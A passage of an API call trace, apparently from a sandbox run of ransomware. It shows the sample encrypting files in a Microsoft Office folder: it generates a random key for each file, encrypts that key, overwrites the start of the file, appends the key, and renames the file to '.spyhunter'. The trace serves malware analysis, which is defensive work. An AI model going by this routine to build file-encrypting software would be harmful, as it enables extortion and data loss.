1 [0104.508] GetProcessHeap () returned 0x2c0000 [0104.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0104.508] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.508] WriteFile (in: hFile=0x16c, lpBuffer=0x270f884*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f844, lpOverlapped=0x0 | out: lpBuffer=0x270f884*, lpNumberOfBytesWritten=0x270f844*=0x4, lpOverlapped=0x0) returned 1 [0104.508] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f844, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f844*=0x30, lpOverlapped=0x0) returned 1 [0104.508] CloseHandle (hObject=0x16c) returned 1 [0104.866] GetProcessHeap () returned 0x2c0000 [0104.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0104.867] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\bdcmetadata.xsd.spyhunter") returned 72 [0104.867] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\bdcmetadata.xsd" (normalized: "c:\\program files\\microsoft office\\office14\\bdcmetadata.xsd"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\bdcmetadata.xsd.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\bdcmetadata.xsd.spyhunter")) returned 1 [0104.927] GetProcessHeap () returned 0x2c0000 [0104.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0104.928] GetProcessHeap () returned 0x2c0000 [0104.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0104.928] GetProcessHeap () returned 0x2c0000 [0104.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c9b660 | out: hHeap=0x2c0000) returned 1 [0104.928] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f880 | out: pbBuffer=0x270f880) returned 1 [0104.928] GetProcessHeap () returned 0x2c0000 [0104.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0104.928] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f878*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f878*=0x30) returned 1 [0104.929] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\codeedit.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0105.324] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL") returned 59 [0105.324] StrStrW (lpFirst="CODEEDIT.DLL", lpSrch=".txt") returned 0x0 [0105.324] GetProcessHeap () returned 0x2c0000 [0105.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0105.324] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f83c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f83c*=0x2800, lpOverlapped=0x0) returned 1 [0105.584] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.584] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f83c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f83c*=0x2800, lpOverlapped=0x0) returned 1 [0105.584] GetProcessHeap () returned 0x2c0000 [0105.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0105.584] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.584] WriteFile (in: hFile=0x170, lpBuffer=0x270f87c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f83c, lpOverlapped=0x0 | out: lpBuffer=0x270f87c*, lpNumberOfBytesWritten=0x270f83c*=0x4, lpOverlapped=0x0) returned 1 [0105.593] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f83c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f83c*=0x30, lpOverlapped=0x0) returned 1 [0105.593] CloseHandle (hObject=0x170) returned 1 [0105.602] GetProcessHeap () returned 0x2c0000 [0105.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0105.603] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL.spyhunter") returned 69 [0105.603] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\codeedit.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\codeedit.dll.spyhunter")) returned 1 [0105.604] GetProcessHeap () returned 0x2c0000 [0105.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0105.604] GetProcessHeap () returned 0x2c0000 [0105.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0105.604] GetProcessHeap () returned 0x2c0000 [0105.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34e198 | out: hHeap=0x2c0000) returned 1 [0105.604] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f880 | out: pbBuffer=0x270f880) returned 1 [0105.604] GetProcessHeap () returned 0x2c0000 [0105.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0105.604] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f878*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f878*=0x30) returned 1 [0105.604] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\graph.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0105.605] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO") returned 56 [0105.605] StrStrW (lpFirst="GRAPH.ICO", lpSrch=".txt") returned 0x0 [0105.605] GetProcessHeap () returned 0x2c0000 [0105.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0105.605] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f83c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f83c*=0x2fe, lpOverlapped=0x0) returned 1 [0105.633] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffd02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.633] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x270f83c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f83c*=0x2fe, lpOverlapped=0x0) returned 1 [0105.633] GetProcessHeap () returned 0x2c0000 [0105.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0105.633] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.633] WriteFile (in: hFile=0x16c, lpBuffer=0x270f87c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f83c, lpOverlapped=0x0 | out: lpBuffer=0x270f87c*, lpNumberOfBytesWritten=0x270f83c*=0x4, lpOverlapped=0x0) returned 1 [0105.634] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f83c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f83c*=0x30, lpOverlapped=0x0) returned 1 [0105.634] CloseHandle (hObject=0x16c) returned 1 [0105.634] GetProcessHeap () returned 0x2c0000 [0105.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0105.634] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO.spyhunter") returned 66 [0105.634] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\graph.ico"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\graph.ico.spyhunter")) returned 1 [0105.642] GetProcessHeap () returned 0x2c0000 [0105.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0105.642] GetProcessHeap () returned 0x2c0000 [0105.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0105.642] GetProcessHeap () returned 0x2c0000 [0105.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x331e80 | out: hHeap=0x2c0000) returned 1 [0105.642] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f878 | out: pbBuffer=0x270f878) returned 1 [0105.642] GetProcessHeap () returned 0x2c0000 [0105.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0105.643] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f870*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f870*=0x30) returned 1 [0105.643] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll" (normalized: "c:\\program files\\microsoft office\\office14\\gkword.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0105.644] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll") returned 57 [0105.644] StrStrW (lpFirst="GKWord.dll", lpSrch=".txt") returned 0x0 [0105.644] GetProcessHeap () returned 0x2c0000 [0105.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0105.644] ReadFile (in: hFile=0x16c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f834, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f834*=0x2800, lpOverlapped=0x0) returned 1 [0105.647] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.647] WriteFile (in: hFile=0x16c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f834, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f834*=0x2800, lpOverlapped=0x0) returned 1 [0105.647] GetProcessHeap () returned 0x2c0000 [0105.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0105.647] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.647] WriteFile (in: hFile=0x16c, lpBuffer=0x270f874*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f834, lpOverlapped=0x0 | out: lpBuffer=0x270f874*, lpNumberOfBytesWritten=0x270f834*=0x4, lpOverlapped=0x0) returned 1 [0105.678] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f834, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f834*=0x30, lpOverlapped=0x0) returned 1 [0105.678] CloseHandle (hObject=0x16c) returned 1 [0105.678] GetProcessHeap () returned 0x2c0000 [0105.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cd57e8 [0105.678] wnsprintfW (in: pszDest=0x2cd57e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll.spyhunter") returned 67 [0105.678] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll" (normalized: "c:\\program files\\microsoft office\\office14\\gkword.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GKWord.dll.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\gkword.dll.spyhunter")) returned 1 [0105.679] GetProcessHeap () returned 0x2c0000 [0105.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cd57e8 | out: hHeap=0x2c0000) returned 1 [0105.679] GetProcessHeap () returned 0x2c0000 [0105.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0105.679] GetProcessHeap () returned 0x2c0000 [0105.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x331d00 | out: hHeap=0x2c0000) returned 1 [0105.680] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f878 | out: pbBuffer=0x270f878) returned 1 [0105.680] GetProcessHeap () returned 0x2c0000 [0105.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0105.680] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f870*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f870*=0x30) returned 1 [0105.680] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\gantt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0105.695] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL") returned 56 [0105.695] StrStrW (lpFirst="GANTT.DLL", lpSrch=".txt") returned 0x0 [0105.695] GetProcessHeap () returned 0x2c0000 [0105.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0105.695] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f834, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f834*=0x2800, lpOverlapped=0x0) returned 1 [0105.698] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.698] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f834, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f834*=0x2800, lpOverlapped=0x0) returned 1 [0105.698] GetProcessHeap () returned 0x2c0000 [0105.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0105.698] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.698] WriteFile (in: hFile=0x158, lpBuffer=0x270f874*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f834, lpOverlapped=0x0 | out: lpBuffer=0x270f874*, lpNumberOfBytesWritten=0x270f834*=0x4, lpOverlapped=0x0) returned 1 [0105.914] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f834, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f834*=0x30, lpOverlapped=0x0) returned 1 [0105.914] CloseHandle (hObject=0x158) returned 1 [0105.915] GetProcessHeap () returned 0x2c0000 [0105.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cce2d0 [0105.915] wnsprintfW (in: pszDest=0x2cce2d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL.spyhunter") returned 66 [0105.915] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\gantt.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\gantt.dll.spyhunter")) returned 1 [0105.915] GetProcessHeap () returned 0x2c0000 [0105.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cce2d0 | out: hHeap=0x2c0000) returned 1 [0105.915] GetProcessHeap () returned 0x2c0000 [0105.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0105.916] GetProcessHeap () returned 0x2c0000 [0105.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x331b80 | out: hHeap=0x2c0000) returned 1 [0106.560] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f870 | out: pbBuffer=0x270f870) returned 1 [0106.560] GetProcessHeap () returned 0x2c0000 [0106.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0106.561] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f868*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f868*=0x30) returned 1 [0106.561] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\WARN.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\warn.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0106.610] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\WARN.WAV") returned 76 [0106.610] StrStrW (lpFirst="WARN.WAV", lpSrch=".txt") returned 0x0 [0106.610] GetProcessHeap () returned 0x2c0000 [0106.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0106.610] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f82c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f82c*=0x2800, lpOverlapped=0x0) returned 1 [0106.668] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.668] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f82c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f82c*=0x2800, lpOverlapped=0x0) returned 1 [0106.668] GetProcessHeap () returned 0x2c0000 [0106.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0106.668] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.668] WriteFile (in: hFile=0x154, lpBuffer=0x270f86c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f82c, lpOverlapped=0x0 | out: lpBuffer=0x270f86c*, lpNumberOfBytesWritten=0x270f82c*=0x4, lpOverlapped=0x0) returned 1 [0106.691] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f82c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f82c*=0x30, lpOverlapped=0x0) returned 1 [0106.692] CloseHandle (hObject=0x154) returned 1 [0106.693] GetProcessHeap () returned 0x2c0000 [0106.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cce2d0 [0106.693] wnsprintfW (in: pszDest=0x2cce2d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\WARN.WAV.spyhunter") returned 86 [0106.693] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\WARN.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\warn.wav"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\WARN.WAV.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\warn.wav.spyhunter")) returned 1 [0106.694] GetProcessHeap () returned 0x2c0000 [0106.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cce2d0 | out: hHeap=0x2c0000) returned 1 [0106.694] GetProcessHeap () returned 0x2c0000 [0106.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0106.694] GetProcessHeap () returned 0x2c0000 [0106.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c9f178 | out: hHeap=0x2c0000) returned 1 [0106.699] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f868 | out: pbBuffer=0x270f868) returned 1 [0106.700] GetProcessHeap () returned 0x2c0000 [0106.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0106.700] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f860*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f860*=0x30) returned 1 [0106.700] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\wssfilestooliconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0106.701] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImagesMask.bmp") returned 93 [0106.701] StrStrW (lpFirst="WSSFilesToolIconImagesMask.bmp", lpSrch=".txt") returned 0x0 [0106.701] GetProcessHeap () returned 0x2c0000 [0106.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0106.701] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f824, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f824*=0x638, lpOverlapped=0x0) returned 1 [0106.716] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff9c8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.717] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x638, lpNumberOfBytesWritten=0x270f824, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f824*=0x638, lpOverlapped=0x0) returned 1 [0106.717] GetProcessHeap () returned 0x2c0000 [0106.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0106.717] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.717] WriteFile (in: hFile=0x154, lpBuffer=0x270f864*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f824, lpOverlapped=0x0 | out: lpBuffer=0x270f864*, lpNumberOfBytesWritten=0x270f824*=0x4, lpOverlapped=0x0) returned 1 [0106.717] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f824, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f824*=0x30, lpOverlapped=0x0) returned 1 [0106.717] CloseHandle (hObject=0x154) returned 1 [0106.717] GetProcessHeap () returned 0x2c0000 [0106.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cde318 [0106.718] wnsprintfW (in: pszDest=0x2cde318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImagesMask.bmp.spyhunter") returned 103 [0106.718] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\wssfilestooliconimagesmask.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImagesMask.bmp.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\wssfilestooliconimagesmask.bmp.spyhunter")) returned 1 [0106.718] GetProcessHeap () returned 0x2c0000 [0106.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cde318 | out: hHeap=0x2c0000) returned 1 [0106.718] GetProcessHeap () returned 0x2c0000 [0106.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0106.718] GetProcessHeap () returned 0x2c0000 [0106.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b8ab8 | out: hHeap=0x2c0000) returned 1 [0106.718] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f860 | out: pbBuffer=0x270f860) returned 1 [0106.719] GetProcessHeap () returned 0x2c0000 [0106.719] RtlAllocateHeap (HeapHandle=0x2c0000, 